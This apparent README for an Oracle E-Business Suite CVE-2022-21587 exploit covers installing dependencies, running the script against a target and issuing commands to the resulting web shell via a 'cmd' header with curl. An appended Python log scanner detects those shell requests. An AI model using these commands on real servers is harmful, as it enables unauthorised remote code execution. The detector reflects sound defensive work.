/CVE-2022-21587-Oracle-EBS-

This script automates exploitation of CVE-2022-21587 in Oracle E-Business Suite (EBS), an unauthenticated file upload leading to remote code execution.

Prerequisites for running this exploit:

  • python3 with the modules requests, os, sys, slipit
  • uuencode

Before you run it, make sure you use it only for ethical purposes.

If the exploit fails to run:

  • Make sure you have already installed the prerequisite modules

Install requests

  • pip3 install requests

  • Install slipit: git clone https://github.com/usdAG/slipit

    • cd slipit
    • python3 setup.py sdist
    • pip3 install --user dist/* OR python3 -m pip install --user dist/*
  • Install uuencode

    • sudo apt install sharutils
  • Usage: python3 exploit.py http://target.com

    • then the shell will pop up, or you can also run commands through the shell using curl or a web proxy tool (Burp Suite)
    • using curl : curl -k https://target/OA_CGI/FNDWRR.exe -H 'cmd: whoami'
    • using Burp Suite: just add a cmd header to the request with any bash payload you want to execute
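
A defender-side check for the usage described above, as an added example that is not part of the original repository: it scans request logs for calls to the FNDWRR.exe path that carry a cmd header. The JSON-lines log format, its field names and the sample records are assumptions constructed for illustration; a standard access log does not record request headers, so this needs a proxy or WAF log that does.

```python
import json
from urllib.parse import unquote, urlsplit

# Path and header name are the ones the README's usage lines mention.
SHELL_PATH = "/oa_cgi/fndwrr.exe"
SHELL_HEADER = "cmd"

# Constructed sample log (JSON lines); the field names are assumptions.
SAMPLE_LOG = """\
{"ts": "2023-02-01T10:00:01Z", "src": "198.51.100.7", "path": "/OA_CGI/FNDWRR.exe", "headers": {"User-Agent": "curl/7.88", "cmd": "whoami"}}
{"ts": "2023-02-01T10:00:05Z", "src": "10.0.0.12", "path": "/OA_CGI/FNDWRR.exe?temp_id=1", "headers": {"User-Agent": "Mozilla/5.0"}}
{"ts": "2023-02-01T10:00:09Z", "src": "198.51.100.7", "path": "/OA_CGI/%46NDWRR.exe", "headers": {"CMD": "whoami"}}
{"ts": "2023-02-01T10:00:12Z", "src": "10.0.0.15", "path": "/OA_HTML/AppsLogin", "headers": {"cmd": "x"}}
not-json garbage line
"""


def normalise_path(raw):
    """Drop the query string, URL-decode and lower-case the path."""
    return unquote(urlsplit(raw).path).lower()


def find_suspect_requests(lines):
    """Return (ts, src, header value) for each request to the path with a cmd header."""
    hits = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines
        if not isinstance(rec, dict):
            continue
        if not normalise_path(rec.get("path", "")).endswith(SHELL_PATH):
            continue
        # HTTP header names are case-insensitive, so compare lower-cased.
        for name, value in (rec.get("headers") or {}).items():
            if name.lower() == SHELL_HEADER:
                hits.append((rec.get("ts"), rec.get("src"), value))
    return hits


if __name__ == "__main__":
    for ts, src, value in find_suspect_requests(SAMPLE_LOG.splitlines()):
        print(f"{ts} {src} cmd header: {value!r}")
```

Requests to the same path without the header, and the header on other paths, are not reported; the percent-encoded and upper-case variants in the sample are.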